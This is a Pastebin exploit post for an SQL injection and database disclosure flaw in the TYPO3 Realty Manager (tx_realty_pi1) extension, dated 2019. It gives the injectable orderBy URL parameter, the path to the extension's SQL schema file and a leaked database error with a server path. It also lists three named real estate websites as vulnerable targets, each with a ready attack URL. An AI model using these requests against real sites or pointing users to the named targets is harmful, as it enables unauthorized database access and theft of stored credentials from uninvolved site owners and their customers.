Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ############################################################################################
- # Exploit Title : Typo3 CMS Realty Manager tx_realty_pi1 2.0.0 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 18/02/2019
- # Vendor Homepage : typo3.org ~ oliverklee.de
- # Software Download Link : github.com/TYPO3-svn-archive/realty/archive/master.zip
- extensions.typo3.org/extension/download/realty/2.0.0/zip/
- # Software Information Link : extensions.typo3.org/extension/realty/
- github.com/TYPO3-svn-archive/realty
- # Software Version : From 0.1.0 - 0.5.3 to 2.0.0 / All Versions
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ############################################################################################
- # Description about Software :
- ***************************
- Provides a plugin that displays realty objects (properties, real estate),
- including an image gallery for each object.
- ############################################################################################
- # Impact :
- ***********
- * Typo3 Realty Manager tx_realty_pi1 2.0.0 [ and other versions ]
- extension for TYPO3 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize
- user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- * On the other hand, this Software prone to an information exposure/database disclosure vulnerability.
- Successful exploits of this issue may allow an attacker to obtain sensitive
- information by downloading the full contents of the application's database.
- * Any remote user may download the database files and gain access
- to sensitive information including unencrypted authentication credentials.
- ############################################################################################
- # SQL Injection Exploit :
- ***********************
- /index.php?id=[ID-NUMBER]&tx_realty_pi1%5Bcity%5D=[ID-NUMBER]&tx_realty_pi1%5Bdistrict%5D=[ID-NUMBER]&tx_realty_pi1%5BorderBy%5D=[SQL Injection]
- # Database Disclosure Exploit :
- ***************************
- /typo3conf/ext/realty/ext_table.sql
- ############################################################################################
- # Example Vulnerable Sites :
- *************************
- [+] dietmar-buecher.de/index.php?id=33&tx_realty_pi1%5Bcity%5D=1&tx_realty_pi1%5Bdistrict%5D=11818&tx_realty_pi1%5BorderBy%5D=1%27
- [+] fuggerstadtimmobilien.de/typo3conf/ext/realty/ext_tables.sql
- [+] baden-baden-exklusiv-immobilien.de/typo3conf/ext/realty/ext_tables.sql
- ############################################################################################
- # Example SQL Database Error :
- ****************************
- You have an error in your SQL syntax; check the manual that corresponds to your
- MariaDB server version for the right syntax to use near 'LIMIT 0,1' at line 1
- The last built query
- *****************
- SELECT COUNT(*) AS oelib_counter FROM tx_realty_objects
- INNER JOIN tx_realty_cities ON tx_realty_objects.city = tx_realty_cities.uid
- WHERE 1=1 AND tx_realty_objects.deleted=0 AND tx_realty_objects.t3ver_state
- <=0 AND tx_realty_objects.pid<>-1 AND tx_realty_objects.hidden=0 AND
- tx_realty_objects.starttime<=1550508420 AND (tx_realty_objects.endtime=0 OR
- tx_realty_objects.endtime>1550508420) AND tx_realty_cities.deleted=0 AND
- house_type = 2 AND tx_realty_objects.city = 1 AND tx_realty_objects.project_id = LIMIT 0,1
- #0 /home/jail/home/buecher/htdocs/typo3conf/ext/oelib/class.tx_oelib_db.php(394):
- tx_oelib_db::select('COUNT(*) AS oel...', 'tx_realty_objec...', '1=1 AND tx_real...', '', '', '0,1')
- ############################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ############################################################################################
Add Comment
Please, Sign In to add comment